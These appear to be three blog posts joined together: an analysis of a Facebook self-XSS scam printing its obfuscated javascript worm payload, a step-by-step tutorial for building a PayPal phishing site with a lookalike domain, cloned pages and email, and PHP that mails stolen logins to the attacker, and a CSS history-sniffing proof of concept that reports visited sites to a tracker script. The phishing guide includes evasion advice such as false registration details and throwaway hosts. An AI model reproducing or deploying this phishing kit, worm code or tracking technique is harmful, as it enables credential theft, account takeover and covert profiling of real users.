This morning I got an e-mail … the typical “[Person] suggested you like [Something]” from Facebook. Typically, this kind of stuff is SPAM; but I checked it out anyways. However, when I got to the page, I didn’t observe just spam; in fact, I observed a cunning exploitation which allows the page to run whatever Javascript code it wishes. It uses a combination of social engineering to prompt the user to perform actions to get a ‘reward’. In the process, the user inadvertently executes Javascript code in their browser.

Watch this video I recorded to see it live in action:

In essence, this is how this exploit works:

1. The user wishes to view a video, and so clicks a ‘View video’ button
2. The user is told that to watch the video, they must perform some certain actions:
   1. Click CTRL + C to copy some text
   2. Click ALT + D to select the browser’s address bar.
   3. Click CTRL + V, and then hit Enter.

And that’s it! The worm has been able to do pretty much whatever it wishes with the user’s Facebook page.

The code copied to the address bar was this:

javascript: (function () {
    a = 'app110436432334612_jop';
    b = 'app110436432334612_jode';
    ifc = 'app110436432334612_ifc';
    ifo = 'app110436432334612_ifo';
    mw = 'app110436432334612_mwrapper';
    eval(function (p, a, c, k, e, r) {
        e = function (c) {
            return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
        };
        if (!''.replace(/^/, String)) {
            while (c--) r[e(c)] = k[c] || e(c);
            k = [function (e) {
                return r[e]
            }];
            e = function () {
                return '\\w+'
            };
            c = 1
        };
        while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
        return p
    }('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);', 62, 69, '||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'), 0, {}))
})();

I’m currently trying to work out what exactly this code is doing (without executing it). I will post an update when (and if) I figure it out; feel free to comment if you get there before me. I suspect it is a worm.

Many people have the idea that phishing scams are complex, and are operated by organised criminals. In fact, they are not that hard to create at all. I could create one, and I could scam people for money. So that’s what I am going to do.* In this article, I will show you how easy it is to create your very own phishing scam set-up. I will deal with the ‘technical side’ — the website and e-mail — but not with harvesting and sending e-mails, not getting caught, etc.

* I’ll stop at the making money part.

The idea is to send an e-mail to people, claiming to be from PayPal, with information they need to act on. We will provide a link which the reader will be tricked into visiting, and then steal their details from our website. From there, it is simply a case of logging into their account, stealing more details, and their money.

(I am not discriminating against PayPal here — most other services on the Internet are susceptible as well).

Our first goal is to get people onto our website. To do this, we need a genuine-looking domain. A few minutes at instantdomainsearch.com will find us one. I registered paypal-query.com. As a criminal would, I used false details. (As a criminal wouldn’t, I used my residential Internet connection).

False details

False details

You could also use a free domain, reducing the risk of everything being traced back to you.

Now we have a domain, we just need a website which looks like PayPal. Its intention is to trick people into thinking it is an official PayPal website, and then to unwittingly provide details to us.

Making this site turns out to be pretty easy. You just copy the HTML from the page, and change all references to images and pages to images and pages on your own site.

Copying PayPal images

Changing PayPal links

Once that is done, we can insert a little bit of PHP code to capture users’ details and e-mail them to us:

if ($_POST) {
	mail("[my email]", "PAYPAL PASS", $_POST["login_email"] . "\n\n" . $_POST["login_password"]);
 
	header("Location: https://referer.us/www.paypal.com/uk/cgi-bin/webscr?cmd=_security-center");
	exit;
}

And that is pretty much it. I also created a .htaccess file to redirect all page requests to the login page. Here is what it looks like — just like PayPal.com:

The phished PayPal site

We need to host our website with somebody who either:

1. does not expect their service to be used with phishing attacks; or
2. does not care whether their service is used for phishing attacks.

Many choose the first option, targeting small, free web-hosts. Reliability is not a concern, and it can be expected that a phishing site is taken down soon after it is hosted. It is therefore a good idea for information to be sent somewhere else. However, it is a better idea to access this information passively: to query a page on the server periodically, than it be actively sent to an address.

The third and most important part of this scam is the e-mail. This is what will prompt the user that they need to take action. One common e-mail is the ‘Your account needs to be verified’ one. We can take a real PayPal e-mail, like this one (or one which is more generic):

An e-mail from PayPal (real)

…and copy the source:

E-mail source

We then simply change all references of www.paypal.com to our site, www.paypal-query.com. The e-mail will appear exactly the same as the valid one, but will fool people into clicking through to our site, where we will attempt to capture their login details. This is what our phished e-mail looks like, much like the authentic one:

Phished PayPal e-mail

Everything we need is now in place. After just ~650 words, you know how to create a phishing site. It may be shocking to find that all you need to create a phishing site is some common sense and the ability to copy and paste some code. In reality, it took me just 3-4 hours to create this. Here is a video demonstration from a victim’s perspective:

Have a look at this page: http://making-the-web.com/misc/sites-you-visit/nojs/. It will fairly quickly and effectively generate a list of sites that you have visited.

This proof of concept demonstrates how basic logic in CSS (Cascading Style Sheets) can be used to query a browser to whether a visitor has visited another web page. More generally, it shows that even simple logic in technology has the possibility of being exploited. Although the data used in this example seems rather unimportant, when used to profile a user’s likes and dislikes, for example, it quickly turns from “data” to personal information.

Fundamentally, this PoC relies on pure CSS. Take, for example, the following CSS…

#link1 {
	color: blue;
}
#link1:visited {
	color: red;
}

…applied to this:

<a id="link1" href="http://google.com/">Visit Google!</a>

From the above, you can deduce that “Visit Google!” will show up blue, by default; the exception to this is when the visitor has visited http://google.com/: the link will show up red. Seems innocent enough, right?

Consider, instead, this:

#link1 {
	color: blue;
}
#link1:visited {
	color: red;
	background: url(http://trackersite.ext/track.php?url=google.com);
}

<a id="link1" href="http://google.com/">Visit Google!</a>

As before, the link will show up blue by default. If the user has visited http://google.com/, it will show up red. However, it also displays a background image for the link. Obviously, to get the background image, the browser has to request it from the server — in doing this, it innocently sends additional information along with the request: ?url=google.com.

You have probably noticed that the background image doesn’t go to an actual image: .png, .gif, etc. Instead, it loads a PHP script. This script has the potential to log the sites a user has visited. Consider the following PHP:

<?php
/* ... */
$ip = $_SERVER["REMOTE_ADDR"]; // the user's IP address
$url = $_GET["url"]; // the URL they have visited
 
// log the information in the database table
mysql_query("INSERT INTO trackdb.log (ip, url) VALUES
	(\"" . mysql_real_escape_string($ip) . "\",
	\"" . mysql_real_escape_string($url) . "\")");
?>

Now that we know how to query the browser for one link, we can do it for many links:

#link1:visited {
	background: url(http://trackersite.ext/track.php?url=google.com);
}
#link2:visited {
	background: url(http://trackersite.ext/track.php?url=yahoo.com);
}
#link3:visited {
	background: url(http://trackersite.ext/track.php?url=amazon.com);
}
#link4:visited {
	background: url(http://trackersite.ext/track.php?url=php.net);
}
/* etc */

<a id="link1" href="http://google.com/">a</a>
<a id="link2" href="http://yahoo.com/">a</a>
<a id="link3" href="http://amazon.com/">a</a>
<a id="link4" href="http://php.net/">a</a>
<!-- etc -->

And it’s that easy! Just put thousands of links in, and you have the ability to find hundreds of pages that a user has visited.

The PoC works as above, fundamentally. In order to check thousands of links, it uses publicly available data from Alexa and Yahoo! API.

Firstly, it scans for website homepages, as provided by Alexa. So http://google.com/, http://yahoo.com/, http://msn.com/, etc. It logs any visit to the server.

Secondly, it scans for individual site pages, such as http://google.com/cookies.html, http://google.com/adsense/, http://yahoo.com/uk/, etc. It will only scan a site’s pages if the site’s homepage was visited (ie, http://google.com/cookies.html will not be queried if http://google.com/ was not visited). To get the list of a site’s pages, it simply does a site:domain.ext query via the Yahoo! API.

Because it can detect 40 million pages, theoretically, it performs querying in “batch mode”: it might check 2,000 pages, and then use a META refresh to scan the next 2,000, and so on.

The PoC demonstrates this functionality using pure CSS and HTML. It could also use AJAX with Javascript to load lists, rather than using Iframes and refreshes.

This exploit currently has the potential to be used in tracking website visitor’s likes and dislikes. This could then in turn be used to display advertisements targeted towards the user. For example, if you know a user has been visiting car-related web pages, you could display an advert for cars, which is likely to get a higher CTR (or click-through probability) than an advert for gardening equipment (unless they also visited sites related to this).

Naturally, many people will consider this information personal when used in this way, and are concerned about how the data is and could be used. Browsers and plugins are likely to reduce the effect of this exploit. (Firefox will be coming with an option to disable the :visited selector)